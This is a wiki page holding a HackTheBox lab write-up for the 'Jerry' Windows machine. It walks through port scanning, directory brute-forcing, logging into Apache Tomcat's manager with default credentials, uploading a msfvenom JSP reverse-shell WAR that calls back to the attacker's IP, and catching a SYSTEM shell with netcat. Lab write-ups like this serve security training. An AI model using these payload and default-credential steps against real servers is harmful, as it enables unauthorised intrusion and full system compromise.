https://book.ghanim.no/index.php?action=history&feed=atom&title=Write-ups%2FHTB%2FJerry Write-ups/HTB/Jerry - Revision history 2026-04-21T15:20:43Z Revision history for this page on the wiki MediaWiki 1.45.1 https://book.ghanim.no/index.php?title=Write-ups/HTB/Jerry&diff=1181&oldid=prev imported>Aghanim at 19:39, 24 January 2022 2022-01-24T19:39:55Z <p></p> <p><b>New page</b></p><div>{{Infobox WriteUp<br /> | name = Jerry<br /> | platform = HackTheBox<br /> | os = Windows<br /> | difficulty = Easy<br /> | techniques = Tomcat, Default Credentials, WAR Upload<br /> }}<br /> <br /> [[File:2022-01-image-119.png|thumb]]<br /> <br /> <br /> This Windows box used default passwords on the Apache tomcat, allowing us to log into the websever and upload a payload that gave us reverse shell. The developers also did a mistake, running the webserver with the user NT AUTHORITY\ SYSTEM, giving us instant high privileged user.<br /> <br /> <br /> ----<br /> <br /> <br /> == Enumeration ==<br /> <br /> <br /> We&#039;ll start with an nmap scan.<br /> <br /> <br /> &lt;syntaxhighlight lang=&quot;bash&quot;&gt;<br /> β”Œβ”€β”€(rootπŸ’€kali)-[/home/aghanim/Desktop/HTB/jerry]<br /> └─# nmap -sC -sV -p- --min-rate 10000 10.10.10.95 -oN nmap.result<br /> Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 18:03 EST<br /> Nmap scan report for 10.10.10.95<br /> Host is up (0.030s latency).<br /> Not shown: 65534 filtered tcp ports (no-response)<br /> PORT STATE SERVICE VERSION<br /> 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1<br /> |_http-favicon: Apache Tomcat<br /> |_http-title: Apache Tomcat/7.0.88<br /> |_http-open-proxy: Proxy might be redirecting requests<br /> |_http-server-header: Apache-Coyote/1.1<br /> <br /> Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .<br /> Nmap done: 1 IP address (1 host up) scanned in 21.36 seconds<br /> &lt;/syntaxhighlight&gt;<br /> <br /> <br /> Only port &#039;&#039;&#039;8080 &#039;&#039;&#039;open on this machine, and its running &#039;&#039;&#039;Apache Tomcat/Coyote JSP engine 1.1&#039;&#039;&#039;.<br /> <br /> <br /> Apache Tomcat is a free and open-source implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies.<br /> <br /> <br /> [[File:2022-01-Pasted-image-20220123000418.png|thumb]]<br /> <br /> <br /> Running a dir brute-force attack against the machine.<br /> <br /> <br /> &lt;syntaxhighlight lang=&quot;bash&quot;&gt;<br /> <br /> β”Œβ”€β”€(rootπŸ’€kali)-[/home/aghanim/Desktop/HTB/jerry]<br /> └─# feroxbuster --url http://10.10.10.95:8080<br /> <br /> ___ ___ __ __ __ __ __ ___<br /> |__ |__ |__) |__) | / ` / \ \_/ | | \ |__<br /> | |___ | \ | \ | \__, \__/ / \ | |__/ |___<br /> by Ben &quot;epi&quot; Risher πŸ€“ ver: 2.4.1<br /> ───────────────────────────┬──────────────────────<br /> 🎯 Target Url β”‚ http://10.10.10.95:8080<br /> πŸš€ Threads β”‚ 50<br /> πŸ“– Wordlist β”‚ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt<br /> πŸ‘Œ Status Codes β”‚ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]<br /> πŸ’₯ Timeout (secs) β”‚ 7<br /> 🦑 User-Agent β”‚ feroxbuster/2.4.1<br /> πŸ’‰ Config File β”‚ /etc/feroxbuster/ferox-config.toml<br /> πŸ”ƒ Recursion Depth β”‚ 4<br /> πŸŽ‰ New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest<br /> ───────────────────────────┴──────────────────────<br /> 🏁 Press [ENTER] to use the Scan Management Menuβ„’<br /> ──────────────────────────────────────────────────<br /> 302 0l 0w 0c http://10.10.10.95:8080/docs<br /> 302 0l 0w 0c http://10.10.10.95:8080/manager<br /> 302 0l 0w 0c http://10.10.10.95:8080/docs/images<br /> 302 0l 0w 0c http://10.10.10.95:8080/docs/api<br /> 302 0l 0w 0c http://10.10.10.95:8080/docs/config<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/images<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/include<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/error<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/xml<br /> 302 0l 0w 0c http://10.10.10.95:8080/manager/images<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/servlets<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/servlets/images<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/servlets/chat<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/plugin<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/security<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/forward<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/sessions<br /> 401 63l 289w 2536c http://10.10.10.95:8080/manager/html<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/servlets/chat/chat<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/cal<br /> 401 63l 289w 2536c http://10.10.10.95:8080/manager/text<br /> 200 23l 45w 650c http://10.10.10.95:8080/examples/jsp/security/protected<br /> 401 63l 289w 2536c http://10.10.10.95:8080/manager/status<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/colors<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/plugin/applet<br /> 200 0l 0w 0c http://10.10.10.95:8080/examples/con<br /> 200 0l 0w 0c http://10.10.10.95:8080/docs/api/con<br /> 200 0l 0w 0c http://10.10.10.95:8080/docs/con<br /> 302 0l 0w 0c http://10.10.10.95:8080/examples/jsp/async<br /> &lt;/syntaxhighlight&gt;<br /> <br /> <br /> == Initial Access ==<br /> <br /> <br /> The interesting sub directories here is &#039;&#039;&#039;/manager. &#039;&#039;&#039;When visiting the page it prompted us to type in a username and password. When failing, this is the 403 message we got.<br /> <br /> <br /> [[File:2022-01-Pasted-image-20220123005646.png|thumb]]<br /> <br /> <br /> The username and password where shown in cleartext in the 403 message. &#039;&#039;&#039;tomcat:s3cret. &#039;&#039;&#039;When logging in its possbile to upload files, so we try to upload a payload that will give us reverse shell.<br /> <br /> <br /> &lt;syntaxhighlight lang=&quot;bash&quot;&gt;<br /> β”Œβ”€β”€(rootπŸ’€kali)-[/home/…/Desktop/HTB/jerry/]<br /> └─# msfvenom -p java/jsp_shell_reverse_tcp -f war LHOST=10.10.14.17 LPORT=4444 &gt; shell.war 1 β¨―<br /> Payload size: 1085 bytes<br /> Final size of war file: 1085 bytes<br /> &lt;/syntaxhighlight&gt;<br /> <br /> <br /> And uploading the shell to the webserver.<br /> <br /> <br /> [[File:2022-01-Pasted-image-20220123021436.png|thumb]]<br /> <br /> <br /> [[File:2022-01-Pasted-image-20220123021507-1.png|thumb]]<br /> <br /> <br /> Now that our shell is uploaded, we start a netcat listener and visit the subdirectory. This will give is a connection back to our listener.<br /> <br /> <br /> &lt;syntaxhighlight lang=&quot;bash&quot;&gt;<br /> β”Œβ”€β”€(rootπŸ’€kali)-[/home/aghanim]<br /> └─# rlwrap nc -lvnp 4444 1 β¨―<br /> listening on [any] 4444 ...<br /> connect to [10.10.14.17] from (UNKNOWN) [10.10.10.95] 49196<br /> Microsoft Windows [Version 6.3.9600]<br /> (c) 2013 Microsoft Corporation. All rights reserved.<br /> <br /> whoami<br /> whoami<br /> nt authority\system<br /> <br /> C:\apache-tomcat-7.0.88&gt;<br /> &lt;/syntaxhighlight&gt;<br /> <br /> <br /> == What I&#039;ve learned ==<br /> <br /> <br /> * Taking a closer look at the HTTP status message that pop up on the screen can reveal useful information.<br /> <br /> [[Category:HackTheBox]]<br /> [[Category:Windows]]<br /> [[Category:Write-ups]]</div> imported>Aghanim